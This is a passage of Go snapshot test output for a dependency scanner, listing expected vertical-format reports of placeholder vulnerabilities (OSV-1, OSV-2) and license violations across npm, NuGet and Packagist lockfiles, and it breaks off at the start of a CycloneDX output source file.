fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine2@3.2.5 (Apache-2.0) 1 license violation found in sbom:/path/to/my/second/lockfile unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in unknown:/path/to/my/third/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithLicenseViolations/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT, Apache-2.0) 2 license violations found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@ (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues Hiding 1 number of vulnerabilities deemed unimportant, use --all-vulns to show them. license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! 
Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile no license violations found unknown:/path/to/my/third/lockfile: found 0 packages with issues Hiding 1 number of vulnerabilities deemed unimportant, use --all-vulns to show them. license violations found: mine1@1.2.3 (Apache-2.0) mine1@1.3.5 (MIT) 2 license violations found in unknown:/path/to/my/third/lockfile --- [TestPrintVerticalResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile no license violations found unknown:/path/to/my/third/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! 
Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in unknown:/path/to/my/third/lockfile license violations found: mine1@1.2.3 (Apache-2.0) mine1@1.3.5 (MIT) 2 license violations found in unknown:/path/to/my/third/lockfile --- [TestPrintVerticalResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@ has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile no license violations found unknown:/path/to/my/third/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in unknown:/path/to/my/third/lockfile license violations found: mine1@1.2.3 (Apache-2.0) mine1@1.3.5 (MIT) 2 license violations found in unknown:/path/to/my/third/lockfile --- [TestPrintVerticalResults_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithMixedIssues/one_source_with_one_deprecated_package - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Total 1 package deprecated. npm lockfile:/path/to/lockfile: found 0 packages with issues no known vulnerabilities found 1 deprecated packages found: deprecated-pkg@1.0.0 --- [TestPrintVerticalResults_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues Hiding 1 number of vulnerabilities deemed unimportant, use --all-vulns to show them. 
license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile no license violations found sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine2@5.9.0 (MIT) 1 license violation found in sbom:/path/to/my/second/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 2 packages with issues mine1@1.2.2 has the following known vulnerabilities: OSV-1: Something scary! 
Severity: 'N/A'; Minimal Fix Version: 'No fix available'; mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 3 known vulnerabilities found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 2 packages with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; mine3@0.4.1 has the following known vulnerabilities: OSV-3: Something mildly scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 3 known vulnerabilities found in sbom:/path/to/my/second/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 2 packages with issues mine1@1.2.2 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 3 known vulnerabilities found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 2 packages with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; mine3@0.4.1 has the following known vulnerabilities: OSV-3: Something mildly scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! 
Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 3 known vulnerabilities found in sbom:/path/to/my/second/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile unknown:/path/to/my/third/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! 
Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in unknown:/path/to/my/third/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 1 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. NuGet sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile Packagist lockfile:/path/to/my/first/lockfile: found 1 package with issues author1/mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 2 known vulnerabilities found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues author3/mine3@0.4.1 has the following known vulnerabilities: OSV-3: Something mildly scary! Severity: '4.3'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 2 known vulnerabilities found in sbom:/path/to/my/second/lockfile npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.2 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] Total 4 packages affected by 5 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 
0 vulnerabilities can be fixed. NuGet sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile Packagist lockfile:/path/to/my/first/lockfile: found 1 package with issues author1/mine1@1.2.3 has the following known vulnerabilities: OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile author1/mine1@1.2.3 has the following uncalled vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 uncalled/unimportant vulnerability found in lockfile:/path/to/my/first/lockfile (filtered out) sbom:/path/to/my/second/lockfile: found 1 package with issues author3/mine3@0.4.1 has the following known vulnerabilities: OSV-3: Something mildly scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 2 known vulnerabilities found in sbom:/path/to/my/second/lockfile npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.2 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. NuGet sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! 
Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile Packagist lockfile:/path/to/my/first/lockfile: found 1 package with issues author1/mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 2 known vulnerabilities found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues author3/mine3@0.4.1 has the following known vulnerabilities: OSV-3: Something mildly scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 2 known vulnerabilities found in sbom:/path/to/my/second/lockfile npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@ has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found --- [TestPrintVerticalResults_WithVulnerabilities/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. 
--- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile mine1@1.2.3 has the following uncalled vulnerabilities: GHSA-123: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 uncalled/unimportant vulnerability found in lockfile:/path/to/my/first/lockfile (filtered out) --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! 
Severity: '9'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues mine1@1.2.3 has the following uncalled vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 uncalled/unimportant vulnerability found in lockfile:/path/to/my/first/lockfile (filtered out) --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 
0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues mine1@1.2.3 has the following uncalled vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 uncalled/unimportant vulnerability found in lockfile:/path/to/my/first/lockfile (filtered out) --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: '8.3'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! 
Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@ has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 2 packages with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: This vulnerability allows for some very scary stuff to happen - seriously,... 
Severity: 'N/A'; Minimal Fix Version: 'No fix available'; mine3@0.10.2-rc has the following known vulnerabilities: OSV-2: (no details available) Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 2 known vulnerabilities found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found --- [TestPrintVerticalResults_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile --- ================================================ FILE: internal/output/cyclonedx.go ================================================ // Package output provides functionality for printing scan results in various formats. 
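package output

import (
	"errors"
	"io"

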